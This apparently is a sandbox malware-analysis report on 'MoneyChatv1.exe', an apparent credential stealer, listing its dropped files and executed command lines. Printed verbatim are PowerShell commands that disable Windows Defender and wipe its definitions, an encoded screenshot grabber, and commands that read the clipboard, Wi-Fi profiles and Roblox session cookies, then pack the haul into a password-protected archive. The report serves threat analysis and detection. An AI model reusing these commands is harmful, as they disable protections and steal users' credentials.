Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
MoneyChatv1.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\5yc1e5ua\5yc1e5ua.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\HPzc3.zip
|
RAR archive data, v5
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\rar.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\rarreg.key
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ ? ? ???\Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5yc1e5ua\5yc1e5ua.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5yc1e5ua\5yc1e5ua.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5yc1e5ua\5yc1e5ua.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\5yc1e5ua\CSC1A0C8093F81540D8AC446D71F7EBBA56.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\RESA5B5.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu May 16 00:51:07 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\blank.aes
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\libcrypto-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\libffi-8.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\libssl-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\python312.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ggwydop.e3s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2acs3myi.odu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hprrwjo.lq4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hgqlykd.gzr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bcegcp3.0cd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brfuwo0c.bgu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu5pvhww.wmi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_giwxqrrq.qox.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfztjrfc.2ed.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5vi2xqx.xtx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzjlcnal.zr1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rodcq3sz.efv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtlp502f.z2j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1lekoyk.lp2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3q2pe00.td4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5ff5122.nm0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u14e4xe4.iiz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubjz1kki.qmy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuqtp5gk.xye.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yu1lrfsc.0op.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3fxqqyo.auw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlatboqb.upd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrvazexk.dqg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwzl1dop.5ih.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\MoneyChatv1.exe
|
"C:\Users\user\Desktop\MoneyChatv1.exe"
|
||
C:\Users\user\Desktop\MoneyChatv1.exe
|
"C:\Users\user\Desktop\MoneyChatv1.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MoneyChatv1.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection
AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent
2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\ ??.scr'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MoneyChatv1.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring
$true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-Clipboard
|
||
C:\Windows\System32\wbem\WMIC.exe
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "systeminfo"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profile
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Windows\System32\reg.exe
|
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\attrib.exe
|
attrib -r C:\Windows\System32\drivers\etc\hosts
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
|
||
C:\Windows\System32\attrib.exe
|
attrib +r C:\Windows\System32\drivers\etc\hosts
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5yc1e5ua\5yc1e5ua.cmdline"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "getmac"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\getmac.exe
|
getmac
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68002\rar.exe a -r -hp"0000" "C:\Users\user\AppData\Local\Temp\HPzc3.zip"
*"
|
||
C:\Users\user\AppData\Local\Temp\_MEI68002\rar.exe
|
C:\Users\user\AppData\Local\Temp\_MEI68002\rar.exe a -r -hp"0000" "C:\Users\user\AppData\Local\Temp\HPzc3.zip" *
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Caption
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic computersystem get totalphysicalmemory
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment'
-Name PROCESSOR_IDENTIFIER"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
|
||
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
